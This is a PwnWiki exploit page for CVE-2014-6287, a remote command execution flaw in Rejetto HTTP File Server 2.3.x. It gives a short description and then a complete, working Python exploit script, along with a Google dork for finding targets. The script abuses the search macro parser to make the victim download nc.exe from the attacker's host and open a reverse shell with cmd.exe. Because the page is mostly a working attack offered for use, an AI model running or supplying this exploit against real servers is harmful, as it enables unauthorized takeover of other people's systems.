CVE-2014-6287 Rejetto HTTP File Server 任意程序執行漏洞

From PwnWiki

INFO

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.


EXP


# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#     It's different from classic file sharing because it uses web technology to be more
#     compatible with today's Internet. It also differs from classic web servers because
#     it's very easy to use and runs "right out-of-the box". Access your remote files, over
#     the network. It has been successfully tested with Wine under Linux.

# Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!

import urllib2 as url
import sys

if len(sys.argv) == 5:
  rhost = sys.argv[1]
  rport = sys.argv[2]
  lhost = sys.argv[3]  # local IP address
  lport = sys.argv[4]  # Local Port number
else:
  print "[-] Something went wrong..!"
  print "[-] Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>" % sys.argv[0]
  print "[-] Don't forget to have an http server with will serve the nc.exe file like http://local_ip:80/nc.exe"
  sys.exit(-1)
vbscript="C:\Users\Public\script.vbs"
ncdownurl="http://"+lhost+"/nc.exe"
ncpathsave="C:\\Users\\Public\\nc.exe"
exe1 = "exec|" + "cscript.exe "+vbscript
exe2 = "exec|" + ncpathsave+" -e cmd.exe " +lhost + " " + lport

save='''save|'''+vbscript+'''|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "'''+ncdownurl+'''", False
xHttp.Send

with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "'''+ncpathsave+'''", 2 '//overwrite
end with
'''

try:
  # create vbs wget nc.exe
  url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(save) + ".}")

  #execute_script
  url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(exe1) + ".}")

  #nc_run():
  url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(exe2) + ".}")
except:
  print "[-] Something went wrong..!"
  print "[-] Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>" % sys.argv[0]
  print "[-] Don't forget to have an http server with will serve the nc.exe file like http://local_ip:80/nc.exe"
  sys.exit(-1)
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2014-6287_Rejetto_HTTP_File_Server_任意程序執行漏洞&oldid=1103"